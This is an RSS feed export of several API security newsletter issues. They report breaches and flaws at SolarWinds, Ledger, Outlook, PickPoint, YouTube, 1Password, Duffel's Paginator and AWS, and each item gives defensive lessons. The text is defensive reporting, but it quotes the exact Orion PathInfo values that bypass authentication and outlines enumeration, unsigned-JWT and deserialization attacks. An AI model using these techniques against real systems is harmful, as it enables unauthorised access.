<p>The tool makes use of a flaw in the GraphQL Apollo Server. The server error messages try to be helpful and, as a result, leak resource names when a call contains wrong values.</p>
<p>Here are a few examples:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-7656 size-full" src="https://apisecurity.io/wp-content/uploads/2021/01/EroOO36W4AQkcG7.jpg" alt="" width="967" height="473" /></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-7657 size-full" src="https://apisecurity.io/wp-content/uploads/2021/01/EroONh_WMDsD4JZ.jpg" alt="" width="1001" height="491" /></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-7658 size-full" src="https://apisecurity.io/wp-content/uploads/2021/01/EroOLvHXAAIjueN.jpg" alt="" width="953" height="458" /></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-7659 size-full" src="https://apisecurity.io/wp-content/uploads/2021/01/EroOKN2XMAIvrM3.jpg" alt="" width="842" height="527" /></p>
<p>See Stupin&#8217;s explanation and demo in this recording of his recent talk in OWASP AppSec Israel. The demo starts around the 13:15 mark.</p>
<p><iframe loading="lazy" title="GraphQL APIs from bug hunter&#039;s perspective by Nikita Stupin" width="640" height="360" src="https://www.youtube.com/embed/nPB8o0cSnvM?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<h2>Opinion: The current state of API security</h2>
<p>Corey Ball is a cybersecurity consultant and the author of the upcoming &#8220;Hacking APIs&#8221; book (the title might still change). PortSwigger has published <a href="https://portswigger.net/blog/hack-your-apis-interview-with-corey-ball-api-security-expert" target="_blank" rel="noopener noreferrer">an interview with him on API security</a>.</p>
<p>The topics included:</p>
<ul>
<li>The current state of API security</li>
<li>Why API security is often overlooked</li>
<li>Examples of breaches</li>
<li>The role of API standards</li>
<li>Advice to companies: scanning, API security testing, business logic review, not relying upon security by obscurity, and so forth.</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-116-facebook-parler-api-vulnerabilities-clairvoyance/">Issue 116: Facebook and Parler API vulnerabilities, clairvoyance</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 115: Vulnerabilities in SolarWinds, Ledger, Outlook. New plugin for JetBrains IDEs</title>
		<link>https://apisecurity.io/issue-115-vulnerabilities-solarwinds-ledger-outlook-new-plugin-jetbrains-ides/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 06 Jan 2021 22:00:46 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7601</guid>

					<description><![CDATA[<p>Happy New Year 2021! This week, we revisit the API aspects of the SolarWinds breach and check out how APIs featured in the recent Ledger breach. There is also an API vulnerability found in Microsoft&#8217;s Office 365 Outlook and a new API development and security plugin for JetBrains IDEs. Vulnerability: SolarWinds The now-infamous SolarWinds breach [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-115-vulnerabilities-solarwinds-ledger-outlook-new-plugin-jetbrains-ides/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-115-vulnerabilities-solarwinds-ledger-outlook-new-plugin-jetbrains-ides/">Issue 115: Vulnerabilities in SolarWinds, Ledger, Outlook. New plugin for JetBrains IDEs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Happy New Year 2021!</p>
<p>This week, we revisit the API aspects of the SolarWinds breach and check out how APIs featured in the recent Ledger breach. There is also an API vulnerability found in Microsoft&#8217;s Office 365 Outlook and a new API development and security plugin for JetBrains IDEs.</p>
<h2>Vulnerability: SolarWinds</h2>
<p>The now-infamous SolarWinds breach that hit multiple US government agencies last month was a supply chain attack. However, it has turned out that, as a cherry on top, SolarWinds Orion API also had an authentication bypass vulnerability.</p>
<p>Some extra parameters in the URI of the request caused Orion to set the <code>SkipAuthorization</code> flag, allowing attacking requests to proceed without authentication. Quoting from <a href="https://kb.cert.org/vuls/id/843464" target="_blank" rel="noopener noreferrer">the vulnerability note</a>:</p>
<blockquote><p><em>The SolarWinds Orion API is embedded into the Orion Core and is used to interface with all SolarWinds Orion Platform products. API authentication can be bypassed by including specific parameters in the <code>Request.PathInfo</code> portion of a URI request, which could allow an attacker to execute unauthenticated API commands. In particular, if an attacker appends a <code>PathInfo</code> parameter of <code>WebResource.adx</code>, <code>ScriptResource.adx</code>, <code>i18n.ashx</code>, or <code>Skipi18n</code> to a request to a SolarWinds Orion server, SolarWinds may set the <code>SkipAuthorization</code> flag, which may allow the API request to be processed without requiring authentication.</em></p></blockquote>
<p>In your own APIs, make sure to:</p>
<ul>
<li>Fully document all parameters and their acceptable values.</li>
<li>Test APIs from the security perspective.</li>
<li>Make sure that anything outside of the expected values gets rejected.</li>
</ul>
<h2>Vulnerability: Ledger</h2>
<p>Ledger, a digital wallet service, was breached in July, and now the attacker has <a href="https://cointelegraph.com/news/ledger-data-leak-a-simple-mistake-exposed-270k-crypto-wallet-buyers" target="_blank" rel="noopener noreferrer">dumped a database with 270,000 personal account details of Ledger users</a>.</p>
<p>The sensitive information got breached in the first place because an API key was hard-coded in the source code of the client application. This allowed the attacker to access Ledger&#8217;s e-commerce database.</p>
<p>Lessons learned:</p>
<ul>
<li>Let&#8217;s repeat together: <em>Never</em> hard-code API keys!</li>
<li>Do not trust client applications; they might get breached.</li>
<li>Do not provide direct database service access; use multi-tier system design.</li>
<li>Ensure that APIs invoked on behalf of a user only have access to the data of that particular user.</li>
</ul>
<h2>Vulnerability: Office 365 Outlook</h2>
<p>Ron Chan has posted a quick video on how he found an API vulnerability in Microsoft&#8217;s Office 365 Outlook.</p>
<p>This was an issue with unsigned JWT tokens. Although the algorithm in use was supposed to be <code>RS256</code>, in reality, JWTs were missing the signature section altogether, allowing attackers to change tokens.</p>
<p>Check out Chan&#8217;s video for more details:</p>
<p><iframe loading="lazy" title="I hacked Outlook and could&#039;ve read all of your EMAILS!" width="640" height="360" src="https://www.youtube.com/embed/t54N4x2uIPs?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<h2>Tools: OpenAPI (Swagger) Plugin for JetBrains IntelliJ/PyCharm/PhpStorm</h2>
<p>API security needs to start with API design, development, and testing.</p>
<p>We have already covered the <a href="https://marketplace.visualstudio.com/items?itemName=42Crunch.vscode-openapi" target="_blank" rel="noopener noreferrer">OpenAPI plugin for Microsoft Visual Studio Code</a> that provides security testing for your API definitions right from the design phase. Now there is a similar <a href="https://plugins.jetbrains.com/plugin/14837-openapi-swagger-editor" target="_blank" rel="noopener noreferrer">plugin for the family of IDEs (Integrated Developer Environments) by JetBrains, including IntelliJ, PyCharm, and PhpStorm</a>.</p>
<p>The plugin makes OpenAPI development easier by providing:</p>
<ul>
<li>OpenAPI HTML preview</li>
<li>Navigation</li>
<li>Go to Definition</li>
<li>IntelliSense</li>
<li>Code snippets</li>
</ul>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7604 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/01/IntelliJ-Editing.gif" alt="" width="1000" height="633" /></p>
<p>And there&#8217;s a built-in static security testing of API contracts, API Contract Security Audit from 42Crunch that runs 200+ different security checks shows found security issues and their possible exploit scenarios, and provides advice on remediation:</p>
<p><img loading="lazy" decoding="async" class="alignleft size-full wp-image-7605" src="https://apisecurity.io/wp-content/uploads/2021/01/IntelliJ-Audit.gif" alt="" width="1000" height="633" /></p>
<p>The post <a href="https://apisecurity.io/issue-115-vulnerabilities-solarwinds-ledger-outlook-new-plugin-jetbrains-ides/">Issue 115: Vulnerabilities in SolarWinds, Ledger, Outlook. New plugin for JetBrains IDEs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 114: SolarWinds and PickPoint breaches, GitHub Code Scanning review, GraphQL security</title>
		<link>https://apisecurity.io/issue-114-solarwinds-pickpoint-breaches-github-code-scanning-review-graphql-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 16 Dec 2020 22:00:21 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7574</guid>

					<description><![CDATA[<p>This week, we check out the API aspects of the recent SolarWinds and PickPoint breaches. Also, we have a review on how to shift API security left with GitHub and 42Crunch and an introduction video on GraphQL security. Breach: SolarWinds The SolarWinds hacking reported this weekend was not API-related as such. It was a supply [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-114-solarwinds-pickpoint-breaches-github-code-scanning-review-graphql-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-114-solarwinds-pickpoint-breaches-github-code-scanning-review-graphql-security/">Issue 114: SolarWinds and PickPoint breaches, GitHub Code Scanning review, GraphQL security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out the API aspects of the recent SolarWinds and PickPoint breaches. Also, we have a review on how to shift API security left with GitHub and 42Crunch and an introduction video on GraphQL security.</p>
<h2>Breach: SolarWinds</h2>
<p>The <a href="https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" target="_blank" rel="noopener noreferrer">SolarWinds hacking reported this weekend</a> was not API-related as such. It was a supply chain attack in which hackers (likely a state actor) managed to add their backdoor in one of the DLL files of SolarWind’s IT monitoring and management software, Orion. After a dormant period, the malicious code would contact the command and control center (C2) to get further instructions and execute them. This was in turn used against SolarWinds&#8217; customers, including multiple US government agencies.</p>
<p>What did catch our eye was the API angle to the story:</p>
<blockquote><p>&#8220;<em>The C2 traffic to the malicious domains is designed to mimic normal SolarWinds API communications.</em>&#8220;</p></blockquote>
<p>The attackers made an effort to make their traffic look like normal SolarWinds API traffic. This allowed them to mask the activity and avoid getting detected by any anomaly detection systems, like machine learning or artificial intelligence.</p>
<h2>Breach: PickPoint</h2>
<p><a href="https://www.zdnet.com/article/hacker-opens-2732-pickpoint-package-lockers-across-moscow/" target="_blank" rel="noopener noreferrer">Attackers opened 2,732 PickPoint package lockers across Moscow</a>. These are lockers that customers can use to pick the goods that they buy online.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7575 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/12/PickPoint_attack.jpg" alt="" width="380" height="214" /></p>
<p>Because this was an actual successful attack rather than ethical research, the details are scant. However, what we know makes it look like an attack against APIs:</p>
<ul>
<li>In the videos posted on the internet, one can see that the lockers get opened one by one, rather than all at once.</li>
<li>The attack was remote and happened across the city, with no attackers physically walking to the locker locations.</li>
<li>PickPoint is API-driven, with parts of their APIs related to vendor integrations <a href="https://pickpoint.ru/sales/api/" target="_blank" rel="noopener noreferrer">publicly documented</a>.</li>
</ul>
<p>Considering these factors, this looks very much like an enumeration and <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">API1:2019 — Broken object-level authorization</a> (BOLA/IDOR) attack against the APIs. Attackers likely found a way to authenticate against the API and then enumerate locker or package IDs on the API calls to open the corresponding lockers.</p>
<p>To avoid such vulnerabilities:</p>
<ul>
<li>Make enumeration hard, do not use sequential numbers.</li>
<li>Use rate limiting and monitoring to prevent using scripted attacks.</li>
<li>Implement authorization, not just authentication, to make sure that the caller has legitimate rights to the operation on that particular object.</li>
</ul>
<h2>Review: API security with GitHub Code Scanning and the 42Crunch GitHub Action</h2>
<p>Security issues are much cheaper to catch and fix early in the development cycle, and API security is not an exception.</p>
<p><a href="http://techgenix.com/finding-api-code-vulnerabilities-before-they-reach-production/" target="_blank" rel="noopener noreferrer">Mitch Tulloch at TechGenix has posted a review</a> on using GitHub Code Scanning and the GitHub Action from 42Crunch, REST API Static Security Testing, to locate and fix API code vulnerabilities before they reach production.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7576 aligncenter" src="https://apisecurity.io/wp-content/uploads/2020/12/42Crunch-GitHub-Alert-Details.png" alt="" width="2736" height="1744" /></p>
<h2>Video: Finding Your Next Bug: GraphQL</h2>
<p>GraphQL APIs are still significantly less frequently used than REST APIs. However, GraphQL is getting traction, yet many developers are less aware of the potential security implications of GraphQL.</p>
<p>Katie Paxton-Fear has posted a new video tutorial that can be valuable as a quick introduction to GraphQL security. She covers, for example, the following topics:</p>
<ul>
<li>The basics of GraphQL</li>
<li>Queries</li>
<li>Mutations</li>
<li>Fragments</li>
<li>Metafields</li>
<li>Introspection</li>
<li>Tools</li>
<li>Typical security bugs and how to find them</li>
</ul>
<p><iframe loading="lazy" title="Finding Your Next Bug: GraphQL" width="640" height="360" src="https://www.youtube.com/embed/jyjGneKJynk?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-114-solarwinds-pickpoint-breaches-github-code-scanning-review-graphql-security/">Issue 114: SolarWinds and PickPoint breaches, GitHub Code Scanning review, GraphQL security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 113: API vulnerabilities at YouTube and 1Password, OIDC security, Assetnote Wordlists</title>
		<link>https://apisecurity.io/issue-113-api-vulnerabilities-youtube-1password-oidc-security-assetnote-wordlists/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 09 Dec 2020 22:00:16 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7552</guid>

					<description><![CDATA[<p>This week, we take a look at the recent API vulnerabilities reported at YouTube and 1Password, a detailed OpenID Connect (OIDC) security research, and how Assetnote Wordlists can be used in API discovery. Vulnerability: YouTube Ryan Kovatch was testing YouTube Video Builder beta when he discovered API flaws in YouTube APIs that it uses. When [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-113-api-vulnerabilities-youtube-1password-oidc-security-assetnote-wordlists/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-113-api-vulnerabilities-youtube-1password-oidc-security-assetnote-wordlists/">Issue 113: API vulnerabilities at YouTube and 1Password, OIDC security, Assetnote Wordlists</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at the recent API vulnerabilities reported at YouTube and 1Password, a detailed OpenID Connect (OIDC) security research, and how Assetnote Wordlists can be used in API discovery.</p>
<h2>Vulnerability: YouTube</h2>
<p>Ryan Kovatch was testing YouTube Video Builder beta when he discovered <a href="https://medium.com/bugbountywriteup/the-youtube-bug-that-allowed-uploads-to-any-channel-3b41c7b7902a" target="_blank" rel="noopener noreferrer">API flaws in YouTube APIs</a> that it uses.</p>
<p>When uploading a video in Video Builder, the tool showed a list of channels owned by the account and allowed the user to pick the channel they wanted. Kovatch found that he could use the API directly to send a different channel ID and one <em>not</em> owned by the user. YouTube did not verify permissions at this point but uploaded the video to the specified channel.</p>
<p>This is a typical example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">OWASP API1:2019 — Broken object-level authorization (BOLA / IDOR)</a>. API enforces authentication but not authorization on specific objects that it affects. This flaw&#8217;s business impact was somewhat limited because the tool and the APIs only uploaded videos as unlisted, and only videos created in the tool could be uploaded. Nevertheless, it could still have put to nefarious uses.</p>
<p>While trying to work around the API limitations, Kovatch accidentally also found an <a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure" target="_blank" rel="noopener noreferrer">OWASP API3:2019 — Excessive data exposure</a> in another YouTube API: One of his calls brought back an error message that leaked hashes of encryption keys used by the server!</p>
<p>Both bugs have been fixed. Lessons learned here:</p>
<ul>
<li>Authentication on its own is not enough. Any time an object belonging to a user is accessed, you must also check whether the current user is authorized to access it.</li>
<li>Make sure you define and enforce schemas and formats on all API responses!</li>
<li>Resist the urge to include sensitive debug information in API responses, even on internal APIs. Attackers may find a way to invoke them and get a hold of sensitive information.</li>
</ul>
<h2>Vulnerability: 1Password</h2>
<p>Ron Chan has posted a video on how he found two API vulnerabilities in 1Password.</p>
<p>Both flaws give guest users access that they are not supposed to have. Thus, they are examples of <a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization" target="_blank" rel="noopener noreferrer">OWASP API5:2019 — Broken function-level authorization</a>.</p>
<p>The video below explains not just the issues themselves but also Chan&#8217;s approach to finding such bugs.</p>
<p><iframe loading="lazy" title="Hacking 1Password | Episode 4 - Two Simple Bugs that Worth $3,300" width="640" height="360" src="https://www.youtube.com/embed/XJdxvvjelfQ?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<h2>Best practices: OpenID Connect security</h2>
<p>Lauritz Holtmann has recently completed his master&#8217;s thesis on real-life OpenID Connect (OIDC) security.</p>
<p>He looked into security issues with some of the most widely used OIDC implementations from AWS Cognito, Bitbucket, GitLab, Keycloak, and Salesforce. Now, he has <a href="https://security.lauritz-holtmann.de/post/sso-security-overview/" target="_blank" rel="noopener noreferrer">published the outcomes of the thesis as a seven-part blog series</a>.</p>
<p>In the series, Holtmann discusses OIDC implementation flaws, such as:</p>
<ul>
<li>Login Confusion</li>
<li>Injection of CRLF sequences</li>
<li>Server-Side Request Forgery (SSRF) issues</li>
</ul>
<p>He also talks about specification problems, like:</p>
<ul>
<li>Redirect URI schemes</li>
<li>Reusable State parameter</li>
</ul>
<p>True to the spirit of science, Holtmann naturally also proposes changes that would address the issues.</p>
<h2>Tools: Assetnote Wordlists</h2>
<p>Security researchers discover API endpoints, paths, and parameters during reconnaissance by trying different elements commonly used in APIs. For example, API URLs often have the word <code>api</code>, the path might have the version element such as <code>v1</code> and there could be path segments like <code>/admin</code>, <code>/users</code>, and so on.</p>
<p>These common practices make it possible for Burp plugins and other tools to take a wordlist and start going through it to enumerate possible API elements.</p>
<p>As a practical example, check out Assetnote&#8217;s collection of such wordlists at <a href="https://wordlists.assetnote.io/" target="_blank" rel="noopener noreferrer">https://wordlists.assetnote.io/</a>.</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-113-api-vulnerabilities-youtube-1password-oidc-security-assetnote-wordlists/">Issue 113: API vulnerabilities at YouTube and 1Password, OIDC security, Assetnote Wordlists</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 112: Vulnerability in Paginator, Microsoft RESTLer, talks on API authentication and JWT security</title>
		<link>https://apisecurity.io/issue-112-vulnerability-paginator-microsoft-restler-talks-api-authentication-jwt-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 02 Dec 2020 22:00:39 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7527</guid>

					<description><![CDATA[<p>This week, we have the recently reported API vulnerability in Duffel&#8217;s Paginator, a new API fuzzer from Microsoft Research, an upcoming JWT security webinar, and a recorded talk on approaches to API authentication. Vulnerability: Paginator Peter Stöckli from Alphabot Security has posted a write-up on the API vulnerability he found in Duffel&#8217;s Paginator (CVE-2020-15150). Duffel [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-112-vulnerability-paginator-microsoft-restler-talks-api-authentication-jwt-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-112-vulnerability-paginator-microsoft-restler-talks-api-authentication-jwt-security/">Issue 112: Vulnerability in Paginator, Microsoft RESTLer, talks on API authentication and JWT security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have the recently reported API vulnerability in Duffel&#8217;s Paginator, a new API fuzzer from Microsoft Research, an upcoming JWT security webinar, and a recorded talk on approaches to API authentication.</p>
<h2>Vulnerability: Paginator</h2>
<p>Peter Stöckli from Alphabot Security has posted <a href="https://www.alphabot.com/security/blog/2020/elixir/Remote-code-execution-vulnerability-in-Elixir-based-Paginator-project.html" target="_blank" rel="noopener noreferrer">a write-up on the API vulnerability he found in Duffel&#8217;s Paginator</a> (CVE-2020-15150).</p>
<p>Duffel is a UK-based startup in that offers a flight searching and booking platform that other businesses can build their sites on. They maintain an Elixir-based open-source project called Paginator. This component helps them and other products implement pagination in API calls. Instead of retrieving all values, API consumers can retrieve only a subset of them. A &#8220;cursor&#8221; value points the place where they left off before:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7528 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/12/duffel_paginator_api.png" alt="" width="748" height="135" /></p>
<p>This cursor value is not a random string but a Base64-encoded binary serialized Erlang external term format (ETF). ETFs can be pretty much anything, from a simple string to a complete executable function. In Duffel&#8217;s case, Paginator blindly trusted the API input, allowing Stöckli to execute arbitrary code on the target system, such as starting xcalc and printing out the stacktrace.</p>
<p>A prime example of the <a href="https://apisecurity.io/encyclopedia/content/owasp/api8-injection" target="_blank" rel="noopener noreferrer">OWASP API8:2019 — Injection</a> vulnerability. Lessons learned here:</p>
<ul>
<li>Be very careful when using external components that expose APIs.</li>
<li>API inputs cannot be trusted: instead of coming from your own components, API calls might originate from an attacker.</li>
<li>Beware of using interpreters on strings that originate from API input.</li>
<li>Always strictly define API parameters and payloads, including string patterns, and enforce them.</li>
</ul>
<h2>Tools: RESTLer</h2>
<p><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Microsoft Research <a href="https://www.microsoft.com/en-us/research/blog/restler-finds-security-and-reliability-bugs-through-automated-fuzzing/" target="_blank" rel="noopener noreferrer">has made their API fuzzing project, RESTLer, opensource</a>.</span></p>
<p>Just like the other two REST API fuzzers that <a href="https://apisecurity.io/issue-109-api-token-best-practices-dredd-idor-hunting-tips/" target="_blank" rel="noopener noreferrer">we have covered before</a>, RESTLer takes the OpenAPI contract file as the API definition it bases the generated tests on. However, the subsequent scenario is very different:</p>
<ul>
<li>RESTLer tries to automatically infer multi-step scenarios. For example, it looks for outputs from one operation that work as inputs for another one, or incompatible operation sequences that always fail. It then executes those scenarios while trying various parameters within allowed ranges, and reports the calls that resulted in errors.</li>
<li><a href="https://dredd.org/" target="_blank" rel="noopener noreferrer">Dredd</a> generates calls within the limitations of the defined OpenAPI contract and reports the responses that do not match the defined responses.</li>
<li><a href="https://42crunch.com/api-conformance-scan/" target="_blank" rel="noopener noreferrer">42Crunch API Contract Conformance Scan</a> generates tests for both request and response validation. It sends purposefully invalid requests (wrong paths, operations, headers, parameters, payloads&#8230;) and reports if they do <em>not</em> get rejected. Just like Dredd, it also reports responses that do not match the contract.</li>
</ul>
<p>Read the details on how RESTLer works from <a href="https://www.microsoft.com/en-us/research/uploads/prod/2018/04/restler.pdf" target="_blank" rel="noopener noreferrer">the original research paper</a>. This whitepaper showcases some real-life results of RESTLer locating bugs in GitLab APIs.</p>
<h2>Webinar: <span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">How to Best Leverage JWTs for API Security</span></h2>
<p><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Next Thursday, December 10, at 8 AM (PST) Isabelle Mauny and I, Dmitry Sotnikov, are hosting <a href="https://us02web.zoom.us/webinar/register/WN_PH3ck0s6SKKuN5vBFUiJtA" target="_blank" rel="noopener noreferrer">a webinar on JWT and API security</a>. We cover common JWT attacks, security best practices, and technology that can be used to protect your APIs against them.  </span></p>
<p><a href="https://us02web.zoom.us/webinar/register/WN_PH3ck0s6SKKuN5vBFUiJtA" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="size-full wp-image-7534 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/12/JWT_API_security_webinar.jpg" alt="" width="600" height="389" /></a></p>
<p>For more details and to sign up for the webinar, click <a href="https://us02web.zoom.us/webinar/register/WN_PH3ck0s6SKKuN5vBFUiJtA" target="_blank" rel="noopener noreferrer">here</a>.</p>
<h2>Video: Serving the right recipe for API authentication</h2>
<p>Philippe De Ryck has posted the <a href="https://pragmaticwebsecurity.com/talks/recipeapiauth.html" target="_blank" rel="noopener noreferrer">slides and the recording from his recent talk &#8220;Serving the right recipe for API authentication&#8221;</a> at the Belgian Visual Studio User Group (Visug).</p>
<p>There are many ways how API authentication can be implemented, and your own scenario will determine which is the right one for you. De Ryck covers the main options used in the industry today, how they work, when and where they are applicable, as well as their pros and cons:</p>
<ul>
<li>Basic authentication</li>
<li>Shared secret</li>
<li>HMAC</li>
<li>Asymmetric signatures</li>
<li>Mutual TLS (mTLS)</li>
<li>Cookies</li>
<li>Tokens</li>
<li>OAuth2</li>
</ul>
<p><iframe loading="lazy" title="VisugXL - Philippe De Ryck - Serving the right recipe for API authentication" width="640" height="360" src="https://www.youtube.com/embed/SS23h9FokUo?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-112-vulnerability-paginator-microsoft-restler-talks-api-authentication-jwt-security/">Issue 112: Vulnerability in Paginator, Microsoft RESTLer, talks on API authentication and JWT security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 111: API vulnerabilities in AWS, Tesla Backup Gateway, Twitter</title>
		<link>https://apisecurity.io/issue-111-api-vulnerabilities-aws-tesla-backup-gateway-twitter/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 25 Nov 2020 22:00:00 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7497</guid>

					<description><![CDATA[<p>Happy Thanksgiving to all of our readers in the US! This week, we take a look at the recent API security issues with Resource-Based Policy APIs at Amazon Web Services (AWS), Backup Gateway APIs at Tesla, and in Twitter Fleets. In addition, we have some free passes to the upcoming DeveloperWeek New York that includes [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-111-api-vulnerabilities-aws-tesla-backup-gateway-twitter/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-111-api-vulnerabilities-aws-tesla-backup-gateway-twitter/">Issue 111: API vulnerabilities in AWS, Tesla Backup Gateway, Twitter</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Happy Thanksgiving to all of our readers in the US!</p>
<p>This week, we take a look at the recent API security issues with Resource-Based Policy APIs at Amazon Web Services (AWS), Backup Gateway APIs at Tesla, and in Twitter Fleets. In addition, we have some free passes to the upcoming DeveloperWeek New York that includes some talks on API security too.</p>
<h2>Vulnerability: AWS Resource-Based Policy APIs</h2>
<p>Researchers at Unit42 found that <a href="https://unit42.paloaltonetworks.com/aws-resource-based-policy-apis/" target="_blank" rel="noopener noreferrer">22 APIs across 16 different AWS services can be exploited</a> to leak Identity and Access Management (IAM) users and roles.</p>
<p>For improved user experience, AWS is trying to help users avoid mistakes when creating often complex resource-based policies and calls APIs to validate various fields present in the policy. One of these calls is to validate the AWS principal in the policy. See a couple of examples in the screenshots below:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7498 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/11/AWS-resource-policy-invalid-principal-errors.png" alt="" width="1874" height="967" /></p>
<p>While surely being helpful to the user, this also means that an attacker could use API calls to determine which identities (users and roles) exist for the account. To make matters worse, the messages on any failures appear in the <em>attacker&#8217;s</em> account logs. Nothing is logged in the target account, so victims do not even detect that they are under attack.</p>
<p>This is effectively a combination of OWASP issues <a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm">API3:2019 — Excessive data exposure</a> and <a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api10-insufficient-logging-and-monitoring.htm">API10:2019 — Insufficient logging and monitoring</a>.</p>
<p>As an API provider, to avoid this kind of issue:</p>
<ul>
<li>Be mindful of the balance between usability and data exposure, especially when designing your error messages. Sadly, security and being user-friendly are often hard to combine.</li>
<li>Make sure that logging and monitoring happens so that it can be used to detect attacks.</li>
</ul>
<p>Unfortunately for AWS customers, the problem still persists. If you are one of them, here&#8217;s some advice from Unit42:</p>
<ul>
<li>Remove inactive users and roles to reduce the attack surface.</li>
<li>Add random strings to usernames and role names to make them more difficult to guess.</li>
<li>Log in with identity provider and federation, so that no additional users are created in the AWS account.</li>
<li>Log and monitor all the identity authentication activities.</li>
<li>Enable two-factor authentication (2FA) for <em>every</em> user and IAM role.</li>
</ul>
<h2>Vulnerability: Tesla Backup Gateway APIs</h2>
